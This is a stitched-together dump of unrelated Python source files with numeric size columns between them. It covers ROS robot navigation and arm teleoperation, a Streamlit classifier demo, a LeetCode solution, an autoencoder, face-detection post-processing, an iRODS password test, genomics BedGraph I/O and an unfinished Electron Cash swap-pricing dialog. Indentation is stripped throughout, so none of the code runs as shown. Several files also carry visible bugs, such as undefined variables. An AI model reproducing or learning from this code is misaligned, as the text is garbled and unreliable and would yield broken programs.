self.pubCurrent = rospy.Publisher('hearts/navigation/pose/location', String, queue_size=10)
self.pubGoal = rospy.Publisher('/hearts/navigation/goal', Pose2D, queue_size=10)
rospy.Subscriber("/record_Location", String, self.recordLocation_callback)
rospy.Subscriber("/go_To_Location", String, self.goToLocation_callback)
# rospy.Subscriber("/clicked_point", PointStamped, self.clicked_callback)
rospy.Subscriber("hearts/navigation/goal/location", String, self.locGoal_callback)
rospy.Subscriber("move_base_simple/current_pose", Pose, self.currentPose_callback)
self.loop()
self.current_location = ''
self.current_pose = Pose()
self.current_goal = ''
self.find_current_location()
def load_dict(self):
# todo: path as ros param
json_name = rospy.get_param('locations_json')
with open(json_name) as json_data:
self.dict = json.load(json_data)
rospy.loginfo("using locations file: " + json_name)
def write_dict(self, updatedLocations):
# todo: path as ros param
json_name = rospy.get_param('locations_json')
with open(json_file, "w") as JSonDictFile:
json.dump(updatedLocations, json_file)
def jsonCheck(self):
if os.path.isfile(self.PATH) and os.access(self.PATH, os.R_OK):
# checks if file exists
print ("File exists and is readable")
return 1
else:
return 0
def recordLocation_callback(self, data):
p = {
data:
{
"header": {
"seq": 0,
"stamp": {
"secs": 0,
"nsecs": 0
},
"frame_id": "/map"
},
"pose": {
"position": {
"x": self.current_pose.point.x,
"y": self.current_pose.point.y,
"z": 0
},
"orientation": {
"x": 0,
"y": 0,
"z": 0,
"w": 0
}
}
}
}
if self.jsonCheck() == 1:
self.load_dict()
LocationsCurrent = self.dict
LocationsCurrent.update(p)
else:
with io.open(self.PATH, 'w') as db_file:
db_file.write(unicode(json.dumps({})))
LocationsCurrent = p
self.write_dict(LocationsCurrent)
def goToLocation_callback(self, data):
goal_location = self.find_pose(data)
self.pubGoal.publish(pose)
# When a location is published, turn it in to a pose goal
def locGoal_callback(self, data):
print data.data
pose = self.find_pose(data.data)
if not pose is None:
self.current_goal = data.data
self.pubGoal.publish(pose)
else:
self.current_goal = None
print "invalid goal location '" + data.data + "'"
# When a pose is published, convert it to a location value
def currentPose_callback(self, data):
print data.data
self.current_pose = data.data
self.pubCurrent.publish(self.find_current_location())
# Get the pose values from the location dict
def find_pose(self, location_name):
try:
print self.dict[location_name]
goal = Pose2D()
goal.x = self.dict[location_name]["x"]
goal.y = self.dict[location_name]["y"]
goal.theta = self.dict[location_name]["theta"]
return goal
except:
return None
# Get the location value from the Pose lookup
def find_current_location(self):
# @TODO get current pose
currentPose = self.current_pose
location = ''
for i in self.dict:
if (self.dict[i]["x"] == currentPose.position.x and self.dict[i]["y"] == currentPose.position.y):
location = i
return location
# loop
def loop(self):
rate = rospy.Rate(1)
while not rospy.is_shutdown():
rate.sleep()
if __name__ == '__main__':
rospy.init_node("task_controller", anonymous=True)
loc = Location()
rospy.spin()
| 4,923 | 1,485 |
#!/usr/bin/env python
"""
Node to convert joystick commands to kinova arm cartesian movements
"""
import rospy
from sensor_msgs.msg import Joy
#from geometry_msgs.msg import Pose
from kortex_driver.msg import TwistCommand, Finger, Empty, Pose
from kortex_driver.srv import SendGripperCommand, SendGripperCommandRequest, GetMeasuredCartesianPose, GetMeasuredCartesianPoseResponse
max_linear_speed = 0.1
max_angular_speed = 0.4
gripper_speed = 0.05
cartesian_min_limit_x = 0.3
restricted_mode = False
joy_topic = "joy"
arm_ns = ""
def joy_listener():
# start node
rospy.init_node("kinova_joy_teleop")
global restricted_mode
restricted_mode = rospy.get_param("~restricted_mode", False)
global arm_ns
arm_ns = rospy.get_param("~arm_ns", "")
global joy_topic
joy_topic = rospy.get_param("~joy_topic", "joy")
rospy.loginfo("restricted mode: " + str(restricted_mode))
# subscribe to joystick messages on topic "joy"
rospy.Subscriber(joy_topic, Joy, joy_cmd_callback, queue_size=1)
# keep node alive until stopped
rospy.spin()
def joy_cmd_callback(data):
# start publisher
pub = rospy.Publisher(arm_ns + "/in/cartesian_velocity", TwistCommand, queue_size=1)
# create gripper command message
cmd = TwistCommand()
if ((data.axes[5] < 0 or data.buttons[5] == 1) and data.buttons[4] != 1):
pose_srv = rospy.ServiceProxy(arm_ns + "/base/get_measured_cartesian_pose", GetMeasuredCartesianPose)
cmd.twist.linear_x = data.axes[1] * max_linear_speed
if (restricted_mode and data.axes[1] < 0):
try:
pose = GetMeasuredCartesianPoseResponse()
pose = pose_srv(Empty())
#rospy.loginfo("Kinova x position: %f")
except rospy.ServiceException as e:
rospy.loginfo("cartesian pose request failed")
if (pose.output.x < cartesian_min_limit_x):
cmd.twist.linear_x = 0
cmd.twist.linear_y = data.axes[0] * max_linear_speed
cmd.twist.linear_z = data.axes[4] * max_linear_speed
cmd.twist.angular_z = -data.axes[3] * max_angular_speed
rospy.loginfo("linear velocities: {%f, %f, %f};", cmd.twist.linear_x, cmd.twist.linear_y, cmd.twist.linear_z)
elif (not restricted_mode and data.axes[2] < 0):
cmd.twist.angular_x = data.axes[1] * max_angular_speed
cmd.twist.angular_y = -data.axes[0] * max_angular_speed
cmd.twist.angular_z = -data.axes[3] * max_angular_speed
rospy.loginfo("angular velocities: {%f, %f, %f};", cmd.twist.angular_x, cmd.twist.angular_y, cmd.twist.angular_z)
if (data.buttons[0] == 1 or data.buttons[1] == 1):
cmd_gripper_req = SendGripperCommandRequest()
cmd_gripper_req.input.mode = 2
fingey = Finger()
gripper_dir = -1 if data.buttons[0] == 1 else 1
fingey.value = gripper_dir*gripper_speed
cmd_gripper_req.input.gripper.finger.append(fingey)
try:
cmd_gripper_srv = rospy.ServiceProxy(arm_ns + "/base/send_gripper_command", SendGripperCommand)
cmd_gripper_srv(cmd_gripper_req)
except rospy.ServiceException as e:
rospy.loginfo(cmd_gripper_req)
rospy.loginfo("joystick gripper command failed")
# publish gripper command
pub.publish(cmd)
if __name__ == '__main__':
try:
joy_listener()
except rospy.ROSInterruptException:
pass
| 3,471 | 1,281 |
kraftausdruecke = [
"Mist",
"Verdammt",
"Mannmannmann",
"Herrgottnochmal",
"Echt jetzt",
"Zum Teufel"
]
berufe = [
"Baggerfรผhrer",
"Velokurier",
"Tierรคrztin",
"Verkehrspolizist",
"Schreinerin",
"Apotheker",
"Komponist",
"Physikerin",
"Buchhรคndlerin"
]
a = choice(kraftausdruecke)
# pick random element in list
# find out its index
# pop it from the list, so it canโt be picked again
b = berufe.pop(berufe.index(choice(berufe)))
c = choice(berufe)
print(a, "Erwin" + ",", "ich bin", b, "und nicht", c + "!")
| 576 | 242 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
# set of all node strings
node_str_set = set()
duplicated_strs = set()
duplicated_nodes = list()
def node2str(node):
"""
this function accomplishes two tasks:
- index each node into a string
- search the duplicated nodes during the traversal
"""
nonlocal node_str_set
nonlocal duplicated_strs
nonlocal duplicated_nodes
if node is None:
return ""
left_str = node2str(node.left)
right_str = node2str(node.right)
node_str = str(node.val) + "(" + left_str + ")" + "(" + right_str + ")"
if node_str in node_str_set:
if node_str not in duplicated_strs:
duplicated_strs.add(node_str)
duplicated_nodes.append(node)
else:
node_str_set.add(node_str)
return node_str
node2str(root)
return duplicated_nodes
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class SolutionCount:
def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
# node_str -> count
node_str_count = defaultdict(int)
duplicated_nodes = list()
def node2str(node):
"""
this function accomplishes two tasks:
- index each node into a string
- search the duplicated nodes during the traversal
"""
nonlocal node_str_count
nonlocal duplicated_nodes
if node is None:
return ""
node_str = "{}({})({})".format(
node.val, node2str(node.left), node2str(node.right))
node_str_count[node_str] += 1
if node_str_count[node_str] == 2:
duplicated_nodes.append(node)
return node_str
node2str(root)
return duplicated_nodes
| 2,429 | 683 |
import streamlit as st
from PIL import Image
import cv2
import numpy as np
from sklearn import datasets
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
st.title("Streamlit Demo App")
st.write("""
# Explorling different classifier on different datasets
""")
dataset_name= st.selectbox("Select Dataset",("","IRIS","BreastCancer","WineDataset"))
if dataset_name!="":
classifier_name=st.selectbox("Select Classifier",("","KNN","RandomForest","SVM"))
if classifier_name!="":
def get_dataset(dataset_name):
if dataset_name=="IRIS":
data=datasets.load_iris()
elif dataset_name=="BreastCancer":
data=datasets.load_breast_cancer()
else:
data=datasets.load_wine()
X=data.data
y=data.target
return X,y
X,y=get_dataset(dataset_name)
st.write("Shape of the dataset",X.shape)
st.write("Number of classes",len(np.unique(y)))
def add_parameter_ui(clf_name):
params=dict()
if clf_name=="KNN":
K=st.slider("K",1,15)
params["K"]=K
elif clf_name=="SVM":
C=st.slider("C",0.01,10.0)
params['C']=C
else:
max_depth=st.slider("max_depth",2,15)
n_estimators=st.slider("n_estimators",1,100)
params["max_depth"]=max_depth
params["n_estimators"]=n_estimators
return params
params=add_parameter_ui(classifier_name)
def get_classifier(clf_name,params):
if clf_name=="KNN":
clf=KNeighborsClassifier(n_neighbors=params["K"])
elif clf_name=="SVM":
clf=SVC(C=params["C"])
else:
clf=RandomForestClassifier(n_estimators=params["n_estimators"],max_depth=params["max_depth"],random_state=42)
return clf
clf=get_classifier(classifier_name,params)
#Classification
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=42)
clf.fit(X_train,y_train)
y_pred=clf.predict(X_test)
acc=accuracy_score(y_pred,y_test)
st.write("Classifier = ",classifier_name)
st.write("Accuracy = ",np.round(acc*100,2),"%")
pca=PCA(2)
X_projected=pca.fit_transform(X)
x1=X_projected[:,0]
x2=X_projected[:,1]
fig=plt.figure()
plt.scatter(x1,x2,c=y,alpha=0.8,cmap='viridis')
plt.xlabel("Principal Component 1")
plt.ylabel("Principal Component 2")
plt.colorbar()
st.pyplot(fig)
# def load_image(image_file):
# img = Image.open(image_file)
# return img
#
# image_file = st.file_uploader("Upload Image",type=['png','jpeg','jpg'])
# if image_file is not None:
# file_details = {"Filename":image_file.name,"FileType":image_file.type,"FileSize":image_file.size}
# st.write(file_details)
#
# img = load_image(image_file)
# st.image(img,width=250,height=250)
# image_array=np.asarray(img)
# st.image(image_array,width=100,height=100)
| 3,391 | 1,170 |
"""
python3 detect.py \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
"""
import argparse
import os
import numpy as np
import tensorflow as tf
import numpy as np
import PIL
import matplotlib.pyplot as plt
import matplotlib.image as matimage
class ConvolutionalAutoencoder(tf.keras.models.Model):
def __init__(self):
super(ConvolutionalAutoencoder,self).__init__()
self.encoder_input_shape = (128,128,3)
self.encoder = tf.keras.models.Sequential([
tf.keras.layers.Input(shape= self.encoder_input_shape),
tf.keras.layers.Conv2D(16, (3,3), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(8, (3,3), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(3, (3,3), activation='relu', padding='same'),
])
self.decoder = tf.keras.Sequential([
# Upsample its input
tf.keras.layers.UpSampling2D((2, 2)),
# tf.keras.layers.Conv2D(3, kernel_size=(3,3),strides=2, activation='relu', padding='same'),
tf.keras.layers.Conv2D(3, kernel_size=(3,3),strides=2, activation='sigmoid', padding='same')])
def call(self, x):
encoded = self.encoder(x)
decoded = self.decoder(encoded)
return decoded
def remove_alpha(img : np) -> np:
return np.array([img[0,:,:,:3]])
def display_sample(img : np):
plt.imshow(img[0])
plt.show()
def Get_Img(path : str) -> np:
img_2 = np.asarray(PIL.Image.open(path).resize((128,128)))
img_2 = np.array([img_2])
img_2 = img_2/255
print("shape: ", img_2.shape)
if img_2.shape[-1] >3:
img_2 = remove_alpha(img_2)
return img_2
def Save(imgarray : np, path : str) -> None:
# method 1
matimage.imsave(os.path.join(path,"output.png"),imgarray)
#method 2 (not working)
# imgarray = imgarray * 255
# imgarray = imgarray.astype(int)
# imgarray = PIL.Image.fromarray(imgarray)
# imgarray.save(os.path.join(path,"output.png"))
def main():
default_encoder_model = 'res/python/res/SavedModels/pretrained_model_encoder.h5'
default_decoder_model = 'res/python/res/SavedModels/pretrained_model_decoder.h5'
image_output_dir = "res/python/res/data/output"
parser = argparse.ArgumentParser()
parser.add_argument('--use_model', type=bool, default=True, help='Use default model?')
parser.add_argument("--img", help=" The relative path of the targeted image to this file.",
default= "None")
parser.add_argument("--display", help=" Display result", default = False)
parser.add_argument("--output_dir", help="The output directory.", default = None)
args = parser.parse_args()
if(args.use_model and args.img != "None"):
print("Using pretrained model.")
else:
print("No Pretrained Model Selected")
return
pixelazer = ConvolutionalAutoencoder()
# Loading Pretrained Model
pixelazer.encoder = tf.keras.models.load_model(default_encoder_model)
pixelazer.decoder = tf.keras.models.load_model(default_decoder_model)
pixelazer.compile(optimizer= "adam", loss=tf.keras.losses.MeanSquaredError())
output = pixelazer.predict(Get_Img(args.img))
if(args.display):
display_sample(output)
if(args.output_dir != None):
Save(output[0],args.output_dir)
print("Done")
exit()
if __name__ == '__main__':
main() | 3,485 | 1,256 |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""post process for 310 inference"""
import os
import numpy as np
from src.model_utils.config import config
from dependency.centernet.src.lib.detectors.base_detector import CenterFaceDetector
from dependency.evaluate.eval import evaluation
dct_map = {'16': '16--Award_Ceremony', '26': '26--Soldier_Drilling', '29': '29--Students_Schoolkids',
'30': '30--Surgeons', '52': '52--Photographers', '59': '59--people--driving--car', '44': '44--Aerobics',
'50': '50--Celebration_Or_Party', '19': '19--Couple', '38': '38--Tennis', '37': '37--Soccer',
'48': '48--Parachutist_Paratrooper', '53': '53--Raid', '6': '6--Funeral', '40': '40--Gymnastics',
'5': '5--Car_Accident', '39': '39--Ice_Skating', '47': '47--Matador_Bullfighter', '61': '61--Street_Battle',
'56': '56--Voter', '18': '18--Concerts', '1': '1--Handshaking', '2': '2--Demonstration',
'28': '28--Sports_Fan', '4': '4--Dancing', '43': '43--Row_Boat', '49': '49--Greeting', '12': '12--Group',
'24': '24--Soldier_Firing', '33': '33--Running', '11': '11--Meeting', '36': '36--Football',
'45': '45--Balloonist', '15': '15--Stock_Market', '51': '51--Dresses', '7': '7--Cheering',
'32': '32--Worker_Laborer', '58': '58--Hockey', '35': '35--Basketball', '22': '22--Picnic',
'55': '55--Sports_Coach_Trainer', '3': '3--Riot', '23': '23--Shoppers', '34': '34--Baseball',
'8': '8--Election_Campain', '9': '9--Press_Conference', '17': '17--Ceremony', '13': '13--Interview',
'20': '20--Family_Group', '25': '25--Soldier_Patrol', '42': '42--Car_Racing', '0': '0--Parade',
'14': '14--Traffic', '41': '41--Swimming', '46': '46--Jockey', '10': '10--People_Marching',
'54': '54--Rescue', '57': '57--Angler', '31': '31--Waiter_Waitress', '27': '27--Spa', '21': '21--Festival'}
def cal_acc(result_path, label_file, meta_file, save_path):
detector = CenterFaceDetector(config, None)
if not os.path.exists(save_path):
for im_dir in dct_map.values():
out_path = os.path.join(save_path, im_dir)
if not os.path.exists(out_path):
os.makedirs(out_path)
name_list = np.load(os.path.join(meta_file, "name_list.npy"), allow_pickle=True)
meta_list = np.load(os.path.join(meta_file, "meta_list.npy"), allow_pickle=True)
for num, im_name in enumerate(name_list):
meta = meta_list[num]
output_hm = np.fromfile(os.path.join(result_path, im_name) + "_0.bin", dtype=np.float32).reshape((1, 200))
output_wh = np.fromfile(os.path.join(result_path, im_name) + "_1.bin", dtype=np.float32).reshape(
(1, 2, 208, 208))
output_off = np.fromfile(os.path.join(result_path, im_name) + "_2.bin", dtype=np.float32).reshape(
(1, 2, 208, 208))
output_kps = np.fromfile(os.path.join(result_path, im_name) + "_3.bin", dtype=np.float32).reshape(
(1, 10, 208, 208))
topk_inds = np.fromfile(os.path.join(result_path, im_name) + "_4.bin", dtype=np.int32).reshape((1, 200))
reg = output_off if config.reg_offset else None
detections = []
for scale in config.test_scales:
dets = detector.centerface_decode(output_hm, output_wh, output_kps, reg=reg, opt_k=config.K,
topk_inds=topk_inds)
dets = detector.post_process(dets, meta, scale)
detections.append(dets)
dets = detector.merge_outputs(detections)
index = im_name.split('_')[0]
im_dir = dct_map.get(index)
with open(save_path + '/' + im_dir + '/' + im_name + '.txt', 'w') as f:
f.write('{:s}\n'.format('%s/%s.jpg' % (im_dir, im_name)))
f.write('{:d}\n'.format(len(dets)))
for b in dets[1]:
x1, y1, x2, y2, s = b[0], b[1], b[2], b[3], b[4]
f.write('{:.1f} {:.1f} {:.1f} {:.1f} {:.3f}\n'.format(x1, y1, (x2 - x1 + 1), (y2 - y1 + 1), s))
print(f"no.[{num}], image_nameL {im_name}")
evaluation(save_path, label_file)
if __name__ == '__main__':
cal_acc(config.result_path, config.label_file, config.meta_file, config.save_path)
| 4,905 | 1,958 |
"""
2018.Jan
@author: Tomoki Emmei
description: program to show multiplication and addition table
"""
import sys #read command line argument
# Display the multiplication table
def kakezan(a,b):
Seki_tab=[[0 for i in range(a)] for j in range(b)]# array for the test
for i in range(1,b+1):
for j in range(1,a+1):
print(i*j, end=' ')
Seki_tab[i-1][j-1]=i*j #store the value
print() #new line
return Seki_tab
# Display the addition table
def tashizan(a,b):
Wa_tab=[[0 for i in range(a)] for j in range(b)]# array for the test
for i in range(1,b+1):
for j in range(1,a+1):
print(i+j, end=' ')
Wa_tab[i-1][j-1]=i+j #store the value
print() #new line
return Wa_tab
def main():
#command line argument 'a' -> addition table 'm' -> multipulication table
args = sys.argv[1]
if args == 'm':
#load numbers from command line
x=int(input('x: '))
y=int(input('y: '))
kakezan(x,y)
elif args == "a":
x=int(input('x: '))
y=int(input('y: '))
tashizan(x,y)
else:
print('Caution: argument is a or m') # exception handling
if __name__ == '__main__':
main()
| 1,231 | 440 |
from typing import Callable
import numpy as np
from iliad.integrators.states.lagrangian_leapfrog_state import LagrangianLeapfrogState
from iliad.integrators.fields import riemannian
from iliad.linalg import solve_psd
from odyssey.distribution import Distribution
class RiemannianLeapfrogState(LagrangianLeapfrogState):
"""The Riemannian leapfrog state uses the Fisher information matrix to provide
a position-dependent Riemannian metric. As such, computing the gradients of
the Hamiltonian requires higher derivatives of the metric, which vanish in
the Euclidean case.
"""
def __copy__(self):
state = RiemannianLeapfrogState(self.position.copy(), self.momentum.copy())
state.log_posterior = self.log_posterior.copy()
state.grad_log_posterior = self.grad_log_posterior.copy()
state.velocity = self.velocity.copy()
state.metric = self.metric.copy()
state.inv_metric = self.inv_metric.copy()
state.sqrtm_metric = self.sqrtm_metric.copy()
state.logdet_metric = self.logdet_metric.copy()
state.jac_metric = self.jac_metric.copy()
state.grad_logdet_metric = self.grad_logdet_metric.copy()
state.force = self.force.copy()
return state
def update(self, distr: Distribution):
super().update(distr)
self.velocity = riemannian.velocity(self.inv_metric, self.momentum)
self.force = riemannian.force(self.velocity, self.grad_log_posterior, self.jac_metric, self.grad_logdet_metric)
| 1,524 | 469 |
# Copyright (c) 2013, University of Liverpool
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Author : Jerome Fuselier
#
from irods import *
USER = "testModify"
PW = "1Password"
if __name__ == "__main__":
status, myEnv = getRodsEnv()
# This have to be a user in the rodsadmin group
conn, errMsg = rcConnect(myEnv.rodsHost, myEnv.rodsPort,
myEnv.rodsUserName, myEnv.rodsZone)
status = clientLogin(conn)
# Create a user with the name and the group
user = createUser(conn, USER, "rodsuser")
delete_user_after = True
if not user:
delete_user_after = False # If the user exists we won't delete it
user = getUser(conn, USER)
#print setPassword(conn, user.getName(), PW)
print "status for modification: ", user.setPassword(PW)
conn.disconnect()
# Test connection for our modified user
conn, errMsg = rcConnect("localhost", 1247, USER, "tempZone")
status = clientLoginWithPassword(conn, PW)
print "Status for the connection with our modified user %s: %d" % (USER, status)
conn.disconnect()
if delete_user_after:
conn, errMsg = rcConnect(myEnv.rodsHost, myEnv.rodsPort,
myEnv.rodsUserName, myEnv.rodsZone)
status = clientLogin(conn)
deleteUser(conn, USER)
conn.disconnect()
| 2,002 | 624 |
# Copyright 2018 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes for reading and writing BedGraph files.
The BedGraph format is described at
https://genome.ucsc.edu/goldenpath/help/bedgraph.html
API for reading:
```python
from nucleus.io import bedgraph
# Iterate through all records.
with bed.BedGraphReader(input_path) as reader:
for record in reader:
print(record)
```
where `record` is a `nucleus.genomics.v1.BedGraphRecord` protocol buffer.
API for writing:
```python
from nucleus.io import bedgraph
from nucleus.protos import bedgraph_pb2
# records is an iterable of nucleus.genomics.v1.BedGraphRecord protocol buffers.
records = ...
# Write all records to the desired output path.
with bed.BedGraphWriter(output_path) as writer:
for record in records:
writer.write(record)
```
For both reading and writing, if the path provided to the constructor contains
'.tfrecord' as an extension, a `TFRecord` file is assumed and attempted to be
read or written. Otherwise, the filename is treated as a true BedGraph file.
Files that end in a '.gz' suffix cause the file to be treated as compressed
(with BGZF if it is a BedGraph file, and with gzip if it is a TFRecord file).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from nucleus.io import genomics_reader
from nucleus.io import genomics_writer
from nucleus.io.python import bedgraph_reader
from nucleus.io.python import bedgraph_writer
from nucleus.protos import bedgraph_pb2
class NativeBedGraphReader(genomics_reader.GenomicsReader):
"""Class for reading from native BedGraph files.
Most users will want to use BedGraphReader instead, because it dynamically
dispatches between reading native BedGraph files and TFRecord files based on
the filename's extension.
"""
def __init__(self, input_path, num_fields=0):
"""Initializes a NativeBedGraphReader.
Args:
input_path: string. A path to a resource containing BedGraph records.
num_fields: int. The number of fields to read in the BedGraph. If unset or
set to zero, all fields in the input are read.
"""
super(NativeBedGraphReader, self).__init__()
bedgraph_path = input_path.encode('utf8')
self._reader = bedgraph_reader.BedGraphReader.from_file(bedgraph_path)
def query(self):
"""Returns an iterator for going through the records in the region.
NOTE: This function is not currently implemented by NativeBedGraphReader
though it could be implemented for sorted, tabix-indexed BedGraph files.
"""
raise NotImplementedError('Can not currently query a BedGraph file')
def iterate(self):
"""Returns an iterable of BedGraphRecord protos in the file."""
return self._reader.iterate()
def __exit__(self, exit_type, exit_value, exit_traceback):
self._reader.__exit__(exit_type, exit_value, exit_traceback)
class BedGraphReader(genomics_reader.DispatchingGenomicsReader):
"""Class for reading BedGraphRecord protos from BedGraph or TFRecord files."""
def _native_reader(self, input_path, **kwargs):
return NativeBedGraphReader(input_path, **kwargs)
def _record_proto(self):
return bedgraph_pb2.BedGraphRecord
class NativeBedGraphWriter(genomics_writer.GenomicsWriter):
"""Class for writing to native BedGraph files.
Most users will want BedGraphWriter, which will write to either native
BedGraph files or TFRecord files, based on the output filename's extension.
"""
def __init__(self, output_path, header=None):
"""Initializer for NativeBedGraphWriter.
Args:
output_path: str. The path to which to write the BedGraph file.
"""
super(NativeBedGraphWriter, self).__init__()
self._writer = bedgraph_writer.BedGraphWriter.to_file(output_path)
def write(self, proto):
self._writer.write(proto)
def __exit__(self, exit_type, exit_value, exit_traceback):
self._writer.__exit__(exit_type, exit_value, exit_traceback)
class BedGraphWriter(genomics_writer.DispatchingGenomicsWriter):
"""Class for writing BedGraphRecord protos to BedGraph or TFRecord files."""
def _native_writer(self, output_path):
return NativeBedGraphWriter(output_path)
| 4,727 | 1,404 |
from functools import partial
import math
from electroncash.i18n import _
from electroncash.address import Address
import electroncash.web as web
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from .util import *
from .qrtextedit import ShowQRTextEdit
from electroncash import bchmessage
from electroncash import openswap
from electroncash.util import format_satoshis_plain_nofloat, get_satoshis_nofloat
from electroncash.openswap import cryptos, crypto_list_by_bytes, crypto_list_by_str
def invert(x):
""" Because python does not allow division by zero"""
try:
return 1./x
except ZeroDivisionError:
return math.copysign(math.inf, x)
class PriceInfoBox(QGroupBox):
# how many significant figures to use in price calculations
# cryptocurrency amounts always use full precision
price_sigfigs = 6
# Dialog for creating / editing / viewing OpenSwap offers
def __init__(self, parent, editable=True):
self.parent = parent
self.editable = bool(editable)
QGroupBox.__init__(self, _("Pricing"), parent=parent)
layout = QGridLayout(self)
layout.addWidget(QLabel(_("Want")), 1, 0)
hbox = QHBoxLayout()
layout.addLayout(hbox, 1, 1)
self.want_amount_e = QLineEdit()
self.want_amount_e.textEdited.connect(self.amount_edited)
hbox.addWidget(self.want_amount_e)
self.want_crypto_cb = QComboBox()
self.want_crypto_cb.addItems(crypto_list_by_str)
hbox.addWidget(self.want_crypto_cb)
self.want_price_cb = QCheckBox(_("by price"))
self.want_price_cb.clicked.connect(partial(self.clicked_byprice, 1))
hbox.addWidget(self.want_price_cb)
if not self.editable:
self.want_price_cb.setHidden(True)
self.want_crypto_cb.setDisabled(True)
hbox.addStretch(1)
layout.addWidget(QLabel(_('Give')), 2, 0)
hbox = QHBoxLayout()
layout.addLayout(hbox, 2, 1)
self.give_amount_e = QLineEdit()
self.give_amount_e.textEdited.connect(self.amount_edited)
hbox.addWidget(self.give_amount_e)
self.give_crypto_cb = QComboBox()
self.give_crypto_cb.addItems(crypto_list_by_str)
hbox.addWidget(self.give_crypto_cb)
self.give_price_cb = QCheckBox(_("by price"))
self.give_price_cb.clicked.connect(partial(self.clicked_byprice, 2))
hbox.addWidget(self.give_price_cb)
if not self.editable:
self.give_price_cb.setHidden(True)
self.give_crypto_cb.setDisabled(True)
hbox.addStretch(1)
layout.addWidget(QLabel(_('Price')), 3,0)
vbox = QVBoxLayout()
layout.addLayout(vbox, 3, 1)
hbox = QHBoxLayout()
vbox.addLayout(hbox)
hbox.addStretch(1)
self.price1_e = QLineEdit()
self.price1_e.textEdited.connect(partial(self.price_edited,1))
hbox.addWidget(self.price1_e)
self.price1_label = QLabel()
hbox.addWidget(self.price1_label)
hbox = QHBoxLayout()
vbox.addLayout(hbox)
hbox.addStretch(1)
self.price2_e = QLineEdit()
self.price2_e.textEdited.connect(partial(self.price_edited,2))
hbox.addWidget(self.price2_e)
self.price2_label = QLabel()
hbox.addWidget(self.price2_label)
self.primaryprice = self.price1_e
self.update_cryptos()
self.update_editable()
self.update_amounts()
self.want_crypto_cb.currentIndexChanged[int].connect(self.update_cryptos)
self.give_crypto_cb.currentIndexChanged[int].connect(self.update_cryptos)
def clicked_byprice(self, i, checked):
if not checked:
pass
elif i == 1:
self.give_price_cb.setChecked(False) # make sure other is unchecked
self.price1_e.setFocus(Qt.MouseFocusReason)
elif i == 2:
self.want_price_cb.setChecked(False) # make sure other is unchecked
self.price1_e.setFocus(Qt.MouseFocusReason)
self.update_amounts()
self.update_editable()
def format_price(self, p):
return '%.*g'%(self.price_sigfigs, p)
def amount_edited(self, s):
self.update_amounts()
def price_edited(self, n, s):
if n == 1:
self.primaryprice = self.price1_e
else:
self.primaryprice = self.price2_e
self.update_amounts()
def update_amounts(self,):
# Update the other two dependent amounts based on user-provided ones.
# This uses floats.
wbyprice = self.want_price_cb.isChecked()
gbyprice = self.give_price_cb.isChecked()
if wbyprice or gbyprice:
if self.primaryprice is self.price1_e:
try:
price = float(self.price1_e.text())
iprice = invert(price)
except:
self.price2_e.setText('')
price = None
else:
self.price2_e.setText(self.format_price(iprice))
else:
try:
iprice = float(self.price2_e.text())
price = invert(iprice)
except:
self.price1_e.setText('')
price = None
else:
self.price1_e.setText(self.format_price(price))
if wbyprice:
try:
a = price * 1e8 * float(self.give_amount_e.text())
self.want_amount_e.setText(format_satoshis_plain_nofloat(a))
except:
self.want_amount_e.setText('')
else:
try:
a = iprice * 1e8 * float(self.want_amount_e.text())
self.give_amount_e.setText(format_satoshis_plain_nofloat(a))
except:
self.give_amount_e.setText('')
else:
try:
wa = float(self.want_amount_e.text())
ga = float(self.give_amount_e.text())
except:
self.price1_e.setText('')
self.price2_e.setText('')
else:
self.price1_e.setText(self.format_price(wa*invert(ga)))
self.price2_e.setText(self.format_price(ga*invert(wa)))
def update_editable(self,):
""" Based on the state of 'by price' checkboxes, update read_only-ness
"""
if not self.editable:
self.give_amount_e.setReadOnly(True)
self.want_amount_e.setReadOnly(True)
self.price1_e.setReadOnly(True)
self.price2_e.setReadOnly(True)
elif self.give_price_cb.isChecked():
self.give_amount_e.setReadOnly(True)
self.want_amount_e.setReadOnly(False)
self.price1_e.setReadOnly(False)
self.price2_e.setReadOnly(False)
elif self.want_price_cb.isChecked():
self.give_amount_e.setReadOnly(False)
self.want_amount_e.setReadOnly(True)
self.price1_e.setReadOnly(False)
